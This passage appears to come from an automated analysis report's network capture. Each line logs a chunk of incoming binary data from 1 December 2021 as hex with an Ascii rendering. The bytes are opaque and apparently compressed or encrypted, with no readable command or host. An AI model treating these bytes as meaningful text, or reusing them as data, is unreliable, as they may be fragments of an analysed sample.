c3 e9 e1 db 34 36 1c 41 0f f4 05 88 be 2c 46 26 d2 40 b3 fa b6 3e cf d9 df 97 41 fb 3b 57 49 69 9e 9a 10 3b 5b 94 d7 da 20 d3 57 0e 96 72 5e e6 fe 53 62 44 f1 6c Data Ascii: p/i`/}-b'monXztFH?d1H]aMrB1GB2C19u$I1)(R\(iw"H-,4/Q#Vs8~Vqr.e1p7!>SqP+kc}!7m!_@nJ)HWd846A,F&@>A;WIi;[ Wr^SbDl
2021-12-01 18:26:22 UTC	234	IN	Data Raw: aa 86 49 e4 44 21 e0 b3 f9 2d 73 c0 f4 71 25 49 da c2 d3 d4 80 5d 7b 29 01 51 1f 0b b3 56 fe 4e e4 02 52 a8 4b 2c ef 50 c2 5c bf c9 4b f2 ae 7b 46 41 3e 96 68 da 05 25 6f e5 0b e9 ee 65 b5 d1 dc 11 d8 21 42 f0 43 f0 48 a7 9e 9e d1 dd cb 78 c5 09 a8 91 86 a1 24 7d 80 db c0 c7 60 68 bb 83 5b a8 55 67 24 e3 e9 40 b9 1c 4e 77 f1 0e c3 df 7a 91 06 20 8b 16 f8 91 97 6a a8 7d a8 6f 32 24 3c e9 f3 c9 53 86 2d 5d c0 e9 ce dc c1 3a 3f 0f 33 17 08 98 bc 59 31 11 fe 59 ff 98 de 88 55 f2 ac 75 a9 38 6b 55 c0 9c bc 60 01 9d 63 4c 04 89 65 90 a4 13 0a a3 cf 9b 7e c3 7b ef 9d a5 fd 87 33 39 80 21 22 20 9c 26 3b d7 c8 08 d4 b6 04 18 f7 7a 8f a7 80 60 5f f4 1e 02 b9 75 ad d5 59 14 e8 f6 14 30 4f f4 97 df 13 2e f9 25 af ee d7 e9 71 e7 bd e9 29 f2 f9 7e bb 6c bd ab 24 c8 80 Data Ascii: ID!-sq%I]{)QVNRK,P\K{FA>h%oe!BCHx$}`h[Ug$@Nwz j}o2$<S-]:?3Y1YUu8kU`cLe~{39!" &;z`_uY0O.%q)~l$
2021-12-01 18:26:22 UTC	235	IN	Data Raw: 80 b7 63 1c 07 a5 7e 28 b8 1d cf 0c b0 1c e6 91 63 be 76 ef 4b c7 a3 07 d7 6c 53 76 54 e4 d1 e0 b8 c5 91 19 6b 2d 13 34 d7 6d f4 ed ca 71 5e 4a 68 3e 9d 9c bf 00 59 5c 1c 18 5e 31 d8 7b 46 45 35 5a 21 ec 39 ac 40 c4 d6 be e7 7a 00 c6 7e 15 1b f2 2b de 83 a0 28 67 f5 28 2f 4d 92 f2 29 18 b7 49 d2 6f a2 72 d5 c3 de 22 96 b0 98 4f 66 9d 2e 80 50 e6 f0 4f 9d ab e0 44 1b c2 ef c4 71 1f 56 4d a2 5b 48 5b e2 6f 66 e4 07 62 1f 52 70 13 0b 54 3d 6d fd d7 9c 00 e1 21 7f 43 1c 93 88 93 56 9e c7 27 f1 d7 f2 7c 6d 2d 34 81 73 2d 3d e4 eb 23 e8 f1 ef a1 16 65 82 d5 18 23 88 3a 27 ee 0c a7 3f 47 95 a3 de dc 73 f7 5b d4 a6 6d 5e a1 4f 89 1b d6 5b f9 f8 20 26 a8 c4 40 93 4d 9f 23 11 5b 21 31 b5 df 59 99 35 ba 8e 97 1d 35 7a 39 5b 65 55 1e 75 da d2 cc 71 ca 1c 33 df 8b e7 Data Ascii: c~(cvKlSvTk-4mq^Jh>Y\^1{FE5Z!9@z~+(g(/M)Ior"Of.PODqVM[H[ofbRpT=m!CV'\|m-4s-=#e#:'?Gs[m^O[ &@M#[!1Y55z9[eUuq3
2021-12-01 18:26:22 UTC	237	IN	Data Raw: 04 81 58 1c 55 4a 04 0a f8 90 0a 1f 0f 3b 21 a4 1c ea 28 bb 94 3b 7c f1 ce b3 42 95 3e e1 65 63 15 b8 1b 97 91 2b b9 24 97 5d 19 4a c1 b8 9c f3 2a 2d 61 fa 09 ab 2e 95 48 c1 1b 94 fb 55 4e cb 52 7e f3 b9 58 c3 99 43 22 3c 0f 5b fe 59 38 ab 65 5d 23 13 66 64 f1 66 e5 91 00 e7 7d 15 2d b3 20 04 3c 7e 9d 18 91 50 ce 01 0c fb 38 b6 03 dd df 2b 68 cc ba f1 58 2b 49 38 d0 19 3e c0 32 d9 bb 70 5b 4a a6 8f de f8 5c b5 97 c3 f3 2d 77 8f 33 d2 d8 16 96 f8 25 ff 11 05 d4 bc a0 bd 62 6c d2 76 38 88 9c 1e dd 7f 05 c8 f5 fa 4e c6 78 44 43 65 7d 1f d5 1b d4 aa 59 bb 4e 18 90 8a 67 47 34 37 26 80 6a 16 ef a1 73 09 65 99 f2 ea ba 3c 0b a1 ab 05 67 68 5b 21 17 95 f1 6d bc 81 cf eb 6e 22 bb 21 50 72 b0 b8 27 c1 e1 dd a3 a5 69 3b 11 f0 a6 43 88 1c 96 9d a3 93 68 64 63 6c 70 Data Ascii: XUJ;!(;\|B>ec+$]J*-a.HUNR~XC"<[Y8e]#fdf}- <~P8+hX+I8>2p[J\-w3%blv8NxDCe}YNgG47&jse<gh[!mn"!Pr'i;Chdclp
2021-12-01 18:26:22 UTC	238	IN	Data Raw: f6 d7 7a c5 3f 9f c0 1b 73 25 8a 69 49 31 3f 5d 07 26 5d 3c b8 1e b2 1d 8f 4c d9 84 c8 cc f1 7b ee 33 3d ae 32 5a 4f 24 08 ed b1 d8 c0 46 26 91 a4 38 56 35 08 4a 9c 7d 93 8f 5a 23 94 1f e2 3f ff 65 c1 d2 e1 b2 c4 d3 2e 85 7c d7 72 50 68 f5 3f 5d 0f 0e 93 b7 20 f2 c9 9d d8 41 b4 05 a7 10 2b 0b b6 e5 18 69 e7 48 c5 73 8e c3 cb 96 ed 8e a3 34 7f c7 e8 06 92 33 92 a8 ad 2e e5 e7 29 a4 2b 62 00 a5 46 66 e9 06 b7 c5 dd e0 59 e1 2d c6 6d 4e d9 b3 65 a6 00 da 9f 0e 58 5f f5 e8 e3 8a 8a 7e ef 4a ee ce f6 5e da e7 5b 8c 3d 31 da 0f f9 35 87 c4 fe 2e e8 f2 dc 27 75 98 4b bf 20 ea c4 72 5c df 68 1e 47 fc a1 2c 53 85 a7 d9 51 1b 8f 02 fd f3 51 ad 62 90 49 d0 f8 1f 3a 59 97 1f 58 3f ee b8 17 a9 9f 26 4c 37 a0 88 32 3f 82 9a 10 6d f9 48 eb db 77 90 b5 44 9c 11 f0 9b 91 Data Ascii: z?s%iI1?]&]<L{3=2ZO$F&8V5J}Z#?e.\|rPh?] A+iHs43.)+bFfY-mNeX_~J^[=15.'uK r\hG,SQQbI:YX?&L72?mHwD
2021-12-01 18:26:22 UTC	239	IN	Data Raw: 07 ac 43 99 ad a3 11 c8 90 21 c2 ee c8 23 9e 8b f6 1a bd 4d 28 6c 6c 6a 55 a7 22 20 c6 1e fe 27 1f 3b 0f 3f 28 10 f3 61 7f 40 ce 28 48 74 40 aa ae ad ba 28 a6 9f 61 9b 93 e0 40 43 d6 0c d5 56 e0 26 6e 67 55 a4 ab da ec ef 5a 30 7e 99 74 18 7e 44 3b 9b e3 02 77 a2 47 19 16 6e 8d b7 7e 12 78 1e e4 b6 7d 21 a3 67 f6 bb 6e bd 72 d1 9a f1 2d a8 9a 2f b5 c7 b7 5a ee af 3b 37 1a 56 23 8f 45 44 7a cf 97 fa e9 6f d6 98 60 12 47 2a 25 50 72 d2 9c 4e 5f e3 84 9a a1 c3 dd 67 51 b5 ac e5 42 1f e3 11 5f e8 68 eb 3d c1 68 81 e8 8e 9b c5 20 96 76 ec 9d b3 cc bb b7 21 0f 53 35 af fe cf e7 a6 c1 ed 71 30 ad cb f3 aa 85 63 7d ef 02 5b 13 7e 60 8e 23 be b2 47 27 79 d6 71 e0 74 f3 48 29 d9 fa a1 9a bf e5 65 9b 4c 3a ed dc ac 5e 19 8b dc b8 ac 37 9b cf 89 6e 2a 13 ff 9f 67 79 Data Ascii: C!#M(lljU" ';?(a@(Ht@(a@CV&ngUZ0~t~D;wGn~x}!gnr-/Z;7V#EDzo`G%PrN_gQB_h=h v!S5q0c}[~`#G'yqtH)eL:^7ngy
2021-12-01 18:26:22 UTC	240	IN	Data Raw: b7 80 e2 42 9e ff 9f 79 e5 74 2f 51 86 1a 0f 6b e7 4f 0f b1 c1 79 7a fb 97 05 3a a3 34 a1 8a 5a 0a 00 30 16 13 ec 95 0b ea 3a e1 50 ef 43 58 ea cf 35 a4 37 54 22 34 df 13 a8 4f 98 c2 d6 f6 89 28 65 2e 15 f9 5e 9b b9 9e 4d 41 31 87 11 17 ed 50 33 d7 24 ab d1 54 be ac 1e 11 16 38 0c 85 49 78 f6 19 2c 29 5c 99 3f 05 c8 c1 8b b4 c8 7b 0e 6b 9b fd a1 a9 93 97 a6 41 54 c3 ef 54 7a fd cd db 9d e4 82 45 a3 d1 05 65 41 f1 68 6e 36 ae 95 77 83 73 84 4a 81 20 31 90 e1 e1 d6 4c 47 91 02 d8 77 3f b3 f1 d3 3d 86 3e 91 6b 0a b3 86 f9 cd 88 99 16 5c 78 6f 34 ed 9e ab db 75 66 24 d2 7c e3 5c 44 01 fb cb 2c 63 ef fa 43 2b f4 47 ea 7f c8 37 14 69 a0 fa 28 b0 58 89 31 db fa ed 75 cb 1e 25 e3 df a6 f2 a0 cd b4 66 dc 0b fa 33 96 4c 03 6a bf a3 ce ed 03 7d 9e 7f 32 88 c3 2c 81 Data Ascii: Byt/QkOyz:4Z0:PCX57T"4O(e.^MA1P3$T8Ix,)\?{kATTzEeAhn6wsJ 1LGw?=>k\xo4uf$\|\D,cC+G7i(X1u%f3Lj}2,
2021-12-01 18:26:22 UTC	242	IN	Data Raw: 58 f2 5d b8 9b dc c0 64 7d 77 60 02 3d 57 61 c1 fa b1 90 60 c7 37 75 37 5c 55 33 25 f9 5e e3 c5 63 c5 9a 23 63 a5 80 3a 04 f8 68 ea e4 de 19 10 26 6c fc 8f 4b 6b e2 af 5f 54 df 71 8a b9 fb a8 1b 01 6c 27 19 b5 ef 0f a9 45 0f 11 1d 52 c1 28 66 a6 9d e0 1b 81 f7 5e 98 38 41 e0 e2 ea e4 65 4a ba 7c b7 2d df 53 68 d6 33 7a a2 03 ea 91 ce b8 ad c0 91 dd f2 40 8b b1 d1 2f 2a 94 59 2d e0 1f bf ec 62 e6 3a f2 f3 79 1c 6e e3 28 fa 1c 11 c8 6f 9e 48 49 e8 e2 58 91 4f 1d 8b 57 48 25 68 27 c0 77 04 2a 43 d0 4a 63 85 62 a2 62 b4 56 df b5 1b 8b f9 7c 1d 7d 66 ca 3b a3 18 61 6f 23 81 bf be 0e ff c2 45 e7 04 99 d5 3b 09 12 e6 a9 c7 b3 0a e2 e3 a9 0c 79 cd 25 e6 27 5f 2a 1a f1 c9 28 b1 61 81 57 38 d7 74 75 98 77 75 75 8c 75 cd 93 c5 e3 41 ef b4 b4 26 7e 1f e9 9c 6f aa 9b Data Ascii: X]d}w`=Wa`7u7\U3%^c#c:h&lKk_Tql'ER(f^8AeJ\|-Sh3z@/Y-b:yn(oHIXOWH%h'wCJcbbV\|}f;ao#E;y%'_*(aW8tuwuuuA&~o
2021-12-01 18:26:22 UTC	243	IN	Data Raw: 28 bc 7c c4 da 19 0b 31 27 85 7d f0 d0 6d 6b a2 84 28 4c 13 cf eb 21 95 3a 12 50 a4 10 35 49 06 5e 1c 57 41 dc 27 47 19 89 89 40 15 7d 3f 4f 10 98 0a c4 a8 eb 85 09 72 93 76 fb ad 97 16 91 5a fb 78 32 3f 5f 5a a5 1e 21 91 3f 2e 77 3f 68 82 87 72 44 53 41 14 23 38 4a 94 26 a3 4c 64 5b be 93 61 7b 6a 74 e8 3a 66 da 6b 93 ad 41 53 9f 57 b6 85 86 89 c5 c8 b6 32 ea d5 3d d7 58 ac 5a 44 21 20 e3 f9 2d 90 24 d1 eb 51 cd 1c 29 08 22 25 09 2f 49 76 8a 49 cd ee da e1 2f a9 8f bc c0 88 62 10 96 46 e1 51 da 46 86 8e c3 c8 86 8f 81 76 16 8f ff b3 ca e1 34 36 d0 c3 fe e1 e4 22 de 27 94 b5 7b 50 a1 9e 9a 0a c6 67 36 3e f7 ac df cf 8f b9 30 04 55 3e 38 30 63 13 0c 95 4f 76 0f 25 e3 b0 a3 f6 f4 a6 a5 4a 74 a4 a3 c8 86 84 ea ed 01 56 a9 b3 c6 7d 46 d1 12 b0 81 9f 58 93 8c Data Ascii: (\|1'}mk(L!:P5I^WA'G@}?OrvZx2?_Z!?.w?hrDSA#8J&Ld[a{jt:fkASW2=XZD! -$Q)"%/IvI/bFQFv46"'{Pg6>0U>80cOv%JtV}FX
2021-12-01 18:26:22 UTC	244	IN	Data Raw: 7f d2 24 bf 8c e2 17 1d 9e ea 98 4b ad 10 08 9f d8 51 e3 ca 4b 08 91 01 7f 2a 13 74 70 6b 48 40 e9 4a 0a 5e 1d 10 58 5c 05 7b 9c 24 e5 2f 1a f6 3b f2 0c c7 0b 93 27 8c 8f 13 6d 66 c3 6e d9 e9 9a a3 58 93 68 94 0e cb 39 5f 0f b6 1f 29 2f 2a 43 d0 55 6d 85 62 4b a7 06 37 fa 6c e2 f9 83 c7 e9 80 99 9c 3b 21 63 d5 6e c9 50 48 5b f0 85 fd 61 29 ff ff b3 3d a6 60 33 80 74 bc 1d b8 7d d3 27 d5 bf 97 4a 27 57 d9 1b f1 cf e0 e5 77 93 93 97 c0 a1 f3 96 88 1d 97 dc 5c 3b 4e 39 91 f3 69 5e 51 f5 d7 b0 51 2a c0 a8 8c 36 53 56 9b 16 bb 21 ff e6 4b c3 40 9e 58 70 10 ba c2 5f 9a 0c b2 d6 23 61 a2 86 e8 77 36 10 fb ee b6 73 38 b7 72 2b 1d 03 bf f5 6e b2 83 88 b8 0a b7 60 9d 91 b7 16 5b 97 f2 9c 82 3b f1 de 44 7b 33 c8 33 b2 f0 6d 23 be 43 c6 d7 87 96 54 6d 0d db c2 46 cf Data Ascii: $KQKtpkH@J^X\{$/;'mfnXh9_)/CUmbK7l;!cnPH[a)=`3t}'J'Ww\;N9i^QQ*6SV!K@Xp_#aw6s8r+n`[;D{33m#CTmF
2021-12-01 18:26:22 UTC	245	IN	Data Raw: 5e 23 50 c0 d9 ce cb ef 46 80 31 59 2c cc 7d 35 bb b4 d8 51 71 4c e0 52 72 d7 52 31 81 30 e1 e0 bc f8 e6 81 f0 3a a5 17 81 27 46 42 bd e7 c7 2d fa 95 45 13 a6 9f 25 1a 89 10 95 a7 fd 5c cf a3 04 8f 97 72 06 ba 6f 94 d9 ea e3 ae e2 02 1d 2c 38 93 d6 ed da 89 c6 0c 7a 1c 31 91 b3 33 f7 0c e9 67 38 75 d2 62 83 6a 35 20 de d5 c2 18 49 59 fd 75 ec 60 0f fa 20 18 2e 24 99 05 40 38 61 6c 09 c8 d6 ee f3 46 33 67 81 28 bb 2f 28 e8 b4 7d 8e e4 49 0c 40 1b 55 5d bf ab 19 3f 41 8a 5b 57 42 71 cf 28 a4 11 50 77 89 07 62 66 80 a4 99 20 fe ef 5f 19 f0 1d 13 74 af da 27 17 15 10 fc 56 4a 91 f6 63 68 7b 48 24 fa e3 50 ee 04 22 43 f7 c9 16 2a 40 fe 8b a9 5e f2 64 c6 e6 3c 7a 79 23 4d fd 8b ce 7d 43 3f 55 f1 55 31 13 69 a8 77 53 04 89 2f 51 6d 38 7a 30 7a 05 0b e9 5c de 9f Data Ascii: ^#PF1Y,}5QqLRrR10:'FB-E%\ro,8z13g8ubj5 IYu` .$@8alF3g(/(}I@U]?A[WBq(Pwbf _t'VJch{H$P"C*@^d<zy#M}C?UU1iwS/Qm8z0z\
2021-12-01 18:26:22 UTC	247	IN	Data Raw: d0 d5 4e c1 24 a4 d2 69 bc ee c4 fc 80 99 41 26 3d 93 c7 78 6a f5 32 00 83 37 f2 b4 37 86 98 a7 c3 f6 ed dc 0c d0 ab 0a 3c 0f a9 7e 6c b0 38 97 82 d0 d3 74 f1 bc 9a 29 d9 c8 2d c7 a5 ba e4 80 4b 61 a9 1b 81 3b 9f 19 86 8f ff a2 ad bf cc 14 51 0e 0a a9 8c 38 d2 9e 46 de 1a 89 9a c4 1c 6d ec a5 90 d4 51 ba 47 41 3d b7 2d ac 41 62 0d f4 f5 dc 21 5c d7 60 08 f8 8a 36 6a 55 0f f0 32 3f 1b b5 ed 63 c9 e6 48 d0 47 2b 6a ff 6f 6e a2 d9 aa 08 da ca ae 87 46 c4 cc 2e 85 df eb c3 0c bf 27 08 e3 79 d7 82 a6 0e b9 b0 d3 d6 f2 90 e1 38 bd 89 07 22 45 1b 5f 8f ed 28 ce 9a 18 2b 3a 5c c1 74 20 7d ef df 96 72 56 6b 19 84 72 cd 0a 92 cb cd 0e 44 86 c7 44 b4 26 19 1d a5 fd b6 a3 fc 08 37 09 4e 6d 0d 87 d3 10 bc 3b a3 40 3c e9 d1 a0 af 99 92 8c c4 a2 96 1b d6 2f 50 8a b5 5d Data Ascii: N$iA&=xj277<~l8t)-Ka;Q8FmQGA=-Ab!\`6jU2?cHG+jonF.'y8"E_(+:\t }rVkrDD&7Nm;@</P]
2021-12-01 18:26:22 UTC	247	IN	Data Raw: 68 63 d6 62 4e a3 ff 41 4e c5 e2 69 10 6c 22 c6 d5 2f 9b 1d 50 7e 51 8e 0c 4c 46 a3 61 ec 98 47 ad f8 c6 9e d8 8a a0 6f 46 17 ac 07 eb 91 15 7c 28 d0 46 8d f1 57 7f d4 d6 68 c1 25 e9 d0 79 69 ac 4c ff b7 82 a2 85 11 18 d9 e7 94 72 ec 92 36 19 e4 0c 40 95 26 d1 84 95 90 f6 85 4c dd 3e 21 2a ec 1c 6b 13 6f 8c 70 6e b9 53 e7 b8 56 1f c9 b2 f9 4b f4 fd 10 9a 34 94 a1 ac bf d1 36 50 80 1f e6 e5 f8 cf 3e 76 69 ad 4f 73 11 4a db 75 2b e6 e9 f0 56 a3 7e 28 74 9c 8e 0c 53 a9 a8 03 65 be 9c 68 1d 86 28 7a 55 8c 27 13 1a 38 39 80 2e 3b 91 81 86 a0 ae cb 7e b0 34 5c fe be 17 4f 69 91 7e 8b f3 30 72 2e ae 7f fb 1f cb 8e ef 05 26 ac 88 5f b2 1e 53 ca b5 e7 40 da 36 8e db 13 b2 af 97 49 4c 48 2f f6 33 4b 39 25 45 e6 8c e6 1f 3d 00 86 21 8a d4 29 79 98 3f cc e5 71 ed 0f Data Ascii: hcbNANil"/P~QLFaGoF\|(FWh%yiLr6@&L>!*kopnSVK46P>viOsJu+V~(tSeh(zU'89.;~4\Oi~0r.&_S@6ILH/3K9%E=!)y?q
2021-12-01 18:26:22 UTC	249	IN	Data Raw: f0 0d b4 d5 9c 8d 7d 14 79 c9 24 d7 9e 63 c0 93 ac 01 57 ef f3 2f 39 c1 d9 9d 1d 47 01 ce 41 70 d3 64 9d 20 20 d0 25 21 6f 7f ab f4 32 69 fb 45 78 8b 1a 7b 37 80 80 02 12 39 7a c5 f8 e5 bb 36 bb 07 d6 02 06 e7 28 f9 da b0 07 53 e0 eb 3e d6 a2 83 03 ef 41 78 00 4d 6a d9 b8 67 3f f9 dc 91 64 5c 05 59 f8 79 13 20 1b d0 2d cb 4b 69 ec 72 70 08 3e 8f 63 64 ec 62 05 7c 99 81 dd 29 aa d9 29 f8 2a 6e db f1 82 7d 5a b0 fc bc 51 d3 df fb 56 55 2c a7 91 ad 20 80 c0 8f 5a a7 83 fa 50 1f 16 3d 7f 64 0f 77 16 8f 33 28 b5 6e 6c 48 d8 ff a9 9a 02 95 d4 cc 58 1d 99 fe 0f a2 22 01 26 53 96 56 55 89 94 2e 6a b7 12 89 67 c9 92 cc e0 17 14 16 3a 54 c2 99 ab f1 6c a6 f4 24 f8 4a 9b 31 c8 76 8f 40 cd ea 38 44 cd 3f 06 d0 98 3b 82 60 95 a7 c5 4a 1c 09 74 31 fe d1 64 ba 31 4b 20 Data Ascii: }y$cW/9GApd %!o2iEx{79z6(S>AxMjg?d\Yy -Kirp>cdb\|))*n}ZQVU, ZP=dw3(nlHX"&SVU.jg:Tl$J1v@8D?;`Jt1d1K
2021-12-01 18:26:22 UTC	250	IN	Data Raw: f7 2c 8a 1e 19 d4 dc 03 fe 39 1d 69 03 9f 7d 20 c7 e3 f1 3b e9 2e 59 ce 9f a5 38 62 07 47 14 9c 01 26 43 15 8d 93 79 ac b3 14 b9 f6 85 7b 53 ce 91 81 95 33 fe a9 b3 75 4e 88 1b 20 ec f0 65 33 69 82 6c 1a 9a 87 d7 8f 1e 2a b5 34 c8 6c 93 b2 24 1f 33 a3 89 61 d4 20 dd 33 12 b1 73 66 13 34 c2 41 c0 e0 46 64 2e be 7e 7e 69 91 95 97 5b f4 b2 d7 e4 2b 11 8d 30 f0 fb b0 41 49 d9 d4 72 5b 36 95 6e b9 e5 e6 c5 05 18 5e 35 67 c7 97 09 4c 79 5e 9e 3f 33 59 d8 3a 35 b0 1f e7 45 6d f1 8d 7a da 77 90 a2 f9 96 8c 9f c9 ba 95 9f 58 a0 2b e7 7e b0 0d 2f c9 95 71 f9 80 96 c8 ae f0 b7 a4 b3 1b e3 66 c1 70 3f db 46 3f ba 25 41 03 c9 4e de 3f 59 f9 c0 f8 db 35 a6 f4 9a 66 8a ad f0 28 ca 68 7a 21 3c 16 09 bc 3b 90 5d 1b 16 a2 eb 01 5d 7a 30 cf d1 64 58 4e 6b 0d a4 6d 29 ca bc Data Ascii: ,9i} ;.Y8bG&Cy{S3uN e3il*4l$3a 3sf4AFd.~~i[+0AIr[6n^5gLy^?3Y:5EmzwX+~/qfp?F?%AN?Y5f(hz!<;]]z0dXNkm)
2021-12-01 18:26:22 UTC	251	IN	Data Raw: 09 f2 ca 1e 85 62 89 67 5e 20 e6 eb 66 8a 26 0e 7f c1 b1 17 15 85 be 9f e2 a1 f2 22 89 64 87 84 2d bf 75 ee cd 67 16 9e 12 55 52 04 0c c5 79 2b 28 d7 7b e1 b2 bc f8 73 19 d7 6e 80 88 96 0e cd 42 a0 e7 44 b0 a5 58 2f 8e 68 1f 6c e1 cf 1d c5 76 2d 74 0b 20 0c 13 90 ab 96 06 2c 53 1c 9c a0 b8 f5 1d 1f 9c 86 54 2a 73 b6 d3 1b e8 aa be c9 74 a3 74 17 54 74 3f 82 23 64 72 8a 10 43 d1 1a 71 61 59 c2 0f 97 bc 92 76 63 88 c7 33 2b 4c 2b ab 67 15 2c 52 a9 73 f2 61 1d cb c0 5a 68 cb 79 16 8a 24 86 f4 72 d0 ba 6c d2 a5 69 51 4b d9 4b 85 81 4a 38 6a 12 cf 4a 8c 80 61 48 54 18 76 0b e1 28 1e 2d 7c a4 b2 f1 cd 1f e0 b6 6d ae 7d d0 ae ea 1a 47 c4 6d 94 fc e9 43 1a 76 7d 2e 93 e2 ea 3a ec 88 9f 71 d6 4b af ab 36 46 f6 b8 ab 6f 5a 70 60 c1 29 83 97 75 f0 03 c8 ba 8c 6d 14 Data Ascii: bg^ f&"d-ugURy+({snBDX/hlv-t ,ST*sttTt?#drCqaYvc3+L+g,RsaZhy$rliQKKJ8jJaHTv(-\|m}GmCv}.:qK6FoZp`)um
2021-12-01 18:26:22 UTC	253	IN	Data Raw: 17 29 c8 58 c8 e2 4c 10 38 eb 88 43 cb 7e 65 79 65 28 07 f8 7d 7f 2e e1 ac a8 9a 70 28 24 18 dd 44 36 98 c8 43 35 f3 f0 21 33 25 b1 ca d6 b7 50 d2 3e fa d4 d9 cc 0d cb b0 70 ff a3 c9 93 3f 8b 10 97 73 cd 6d 09 a2 0d e5 e3 62 e9 5d b3 58 14 3b 1c 4c 44 0f b7 4f c2 4f 27 0f 9d 41 43 78 5e 9c 83 ca 15 f4 24 95 cd 49 e4 f2 e4 1b cb 66 c9 45 ae 1d 0c 90 20 dc 7b ea 0c 13 03 2b db 04 c0 75 86 96 8e 34 df 9a dc c0 0f 28 11 09 f9 84 95 56 09 36 48 1c 4b b4 ad c1 eb 00 8a 0a f4 cf 45 64 4c 4e 68 0d b9 fc 78 eb 62 1d cb 7f 4f be b3 d1 76 e6 bb af a4 65 e5 77 67 6f 06 5c 02 54 30 35 ad 31 fc 5e 19 13 f7 8f 1c 9b a6 51 f6 89 1d b6 27 a0 0f 2a 89 02 e5 f4 84 1a 7f 65 11 7b db 20 a4 63 0f 63 94 40 35 76 8c 63 62 6f 6e bd b5 db 71 ee 82 5a 33 de 40 cf 8b f5 0f 4a 1f 14 Data Ascii: )XL8C~eye(}.p($D6C5!3%P>p?smb]X;LDOO'ACx^$IfE {+u4(V6HKEdLNhxbOvewgo\T051^Q'*e{ cc@5vcbonqZ3@J
2021-12-01 18:26:22 UTC	254	IN	Data Raw: d9 3d 3a 77 50 07 6e de 4c c5 32 b9 a4 e2 7c 62 00 7e 12 05 d7 83 3c a6 bb a5 b3 77 53 c0 4e d0 1e 29 6e 33 37 a9 82 9f ef d7 87 bd bf 2b f6 a0 4c c8 64 4b 11 9d ba 2f 67 64 64 8f 83 e4 91 06 d6 a1 88 88 61 63 3e d3 7f 46 b4 05 51 ba 35 d7 db 4d fc df dd a3 60 21 b9 1e 6e 58 84 5e 2c dc 84 c0 b2 81 a4 10 5f 03 d4 03 b9 4b 20 93 7d 20 a4 78 f0 da 35 39 69 e7 d5 56 f0 a8 e3 ca 40 fc 25 fe 59 17 d6 97 b1 51 74 7b 56 aa 95 33 5d 2d 35 86 03 1f 93 12 8d 2a ba 13 78 18 e6 ba 6e 55 96 63 9d a7 a5 ca c8 54 d9 62 24 46 63 49 37 ee c2 a1 d9 2a 72 89 9f ab ef b0 e5 6f 29 1f 19 da bd d4 76 2d 15 1c 22 13 fb ff 65 38 a5 09 54 68 c1 92 77 c3 9e 65 ea f4 04 e4 1d c0 16 d8 11 90 68 ca 22 f5 0b cc ab f4 ad 34 e6 b3 89 71 13 49 ba b0 fa e9 61 de a4 64 b2 76 28 f6 4b ad cb Data Ascii: =:wPnL2\|b~<wSN)n37+LdK/gddac>FQ5M`!nX^,_K } x59iV@%YQt{V3]-5xnUcTb$FcI7ro)v-"e8Thweh"4qIadv(K
2021-12-01 18:26:22 UTC	255	IN	Data Raw: 46 03 89 5f f5 1f 62 be 20 66 ad 3c 95 55 88 85 6b c0 46 a5 5f 16 0a 6f 49 e3 c4 34 23 50 04 f0 f3 6e c7 e1 ce 17 55 b6 f1 6a 72 86 52 83 f7 2f 10 37 2f 56 86 96 9a 83 b4 94 30 46 f6 c9 2b 01 e3 c1 16 a0 62 10 7b a1 8f 2d e7 59 c5 08 4e 6d dc 02 30 2b b0 7f 40 b9 0d 3b 1e a5 36 de 01 d8 b2 1a a4 29 63 ed ff f3 a5 15 30 56 81 44 63 a9 48 5d ea 85 a3 72 1f af 09 04 08 0a 37 04 0e 2a 25 b0 5b 4c 00 f9 0a d7 4e 9c 9e 82 7f 5c a2 24 24 c9 8b 25 21 26 cd 85 c4 7d 4b cc 4f dc 5c f6 34 39 0e 70 76 f7 c4 f4 e0 22 1d a3 14 95 d3 ac 1c 91 84 20 ba 47 9f 3b 7a 40 15 69 3f 05 18 94 92 b2 e7 14 bd c1 c7 66 fd c3 20 3a 73 37 4c f7 24 40 8e f6 ff af 2d ee 86 44 62 94 29 3c f6 af 06 b3 f5 76 6a 3c b5 84 2d 47 06 e8 d8 e9 4d 48 eb de 76 50 a8 84 99 b9 4f 89 de f3 ea 99 49 Data Ascii: F_b f<UkF_oI4#PnUjrR/7/V0F+b{-YNm0+@;6)c0VDcH]r7*%[LN\$$%!&}KO\49pv" G;z@i?f :s7L$@-Db)<vj<-GMHvPOI
2021-12-01 18:26:22 UTC	256	IN	Data Raw: 71 5f 50 cc df 07 e4 3c 70 b8 c6 85 6f 86 f5 1d 65 b7 ec ba 49 b9 e2 26 9a b5 fc e2 b2 5f cd 1e 0b e2 ec db db 14 cd 08 38 ee 53 9d 58 cd 74 7c 1a 15 fa f0 6c 4d 9e 26 20 e3 0e 70 5d b8 c5 a7 37 95 f0 3a 01 6f 1d 7c 60 c1 fa 5f 3b e8 2e 46 dc 47 6d 6a b9 ef e3 4d 1e 46 10 7b 65 f1 78 c5 cb 6d 01 10 14 d3 d9 74 19 b9 75 ac 34 0b cf 60 e3 26 1e db f2 4f e5 47 30 aa 5b 2c db 28 5e 02 ef b7 01 87 e0 96 57 5e a2 97 92 9b a0 67 f5 47 83 6f d9 25 40 23 25 60 a1 7d f6 45 08 fb a3 72 51 c1 73 e8 74 9f 75 53 66 1b f1 ad 16 f0 94 0e a8 f4 92 fc 5b 1d 63 01 e6 df 1f 16 0d 34 e6 bf 32 78 7d f1 a4 7a 80 30 ec 19 fe 78 28 73 36 17 bb d1 bf 57 92 cd 5f 40 60 84 d4 c0 fd 62 d5 66 30 25 5f 22 c4 12 66 f8 85 03 70 20 7c 06 42 9e 8e ed 9c 77 42 56 2f 78 24 0b 32 00 85 2c 1e Data Ascii: q_P<poeI&_8SXt\|lM& p]7:o\|`_;.FGmjMF{exmtu4`&OG0[,(^W^gGo%@#%`}ErQstuSf[c42x}z0x(s6W_@`bf0%_"fp \|BwBV/x$2,
